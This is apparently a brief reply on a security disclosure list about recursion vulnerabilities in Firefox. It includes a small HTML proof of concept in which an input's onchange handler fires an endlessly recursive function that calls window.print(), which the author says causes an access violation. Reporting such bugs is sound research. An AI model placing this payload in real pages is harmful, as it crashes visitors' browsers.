There is no doubt that's recursion. I must say I know there's much more of such vulnerabilities in FF. One of those is below (this is an access violation vulnerability and has to deal with recursion, too).

<script>
function owned(){

window.print();
owned();
}
</script>
<input type="foo" size="30" id="bar" onchange="owned()">

Kind regards,
Michal Bucko

[ reply ]